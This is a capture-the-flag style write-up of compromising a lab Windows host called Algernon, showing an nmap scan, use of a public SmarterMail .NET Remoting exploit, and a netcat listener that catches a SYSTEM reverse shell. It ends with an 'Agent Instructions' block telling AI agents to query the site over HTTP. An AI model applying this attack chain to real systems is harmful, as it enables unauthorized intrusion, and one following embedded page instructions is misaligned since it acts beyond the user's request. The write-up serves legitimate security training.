# Algernon

## Nmap

```
sudo nmap 192.168.147.65 -p- -sV -sS    

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
9998/tcp  open  http          Microsoft IIS httpd 10.0
17001/tcp open  remoting      MS .NET Remoting services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Port 80 redirects to the default IIS page.

![](/files/-MUYsBqlW34l8V_WTrpS)

Port 9998 directs us to the following login page for SmarterMail.

![](/files/-MUYs1WrxgQa_-fEMBU-)

Researching exploits for SmarterMail on Google we come across an interesting exploit:

{% embed url="<https://www.exploit-db.com/exploits/49216>" %}

Looking at the description for this is exploit we have the following:

![](/files/-MUYsyu9NmdKt0qcdWiN)

Looking at the `nmap` results from earlier we do have .NET remoting running on port 17001. As such this exploit should be applicable to the target machine.

I downloaded the exploit and edited the following portion to match my IP and to use the local port of 21.

![](/files/-MUYtYZGoL8tqOaE_TgJ)

I then set up a `netcat` listener for port 21.

```
sudo nc -lvp 21
```

Then executed the exploit and received a reverse shell as SYSTEM.

![](/files/-MUYtuaX9niBh34gqavk)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/algernon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.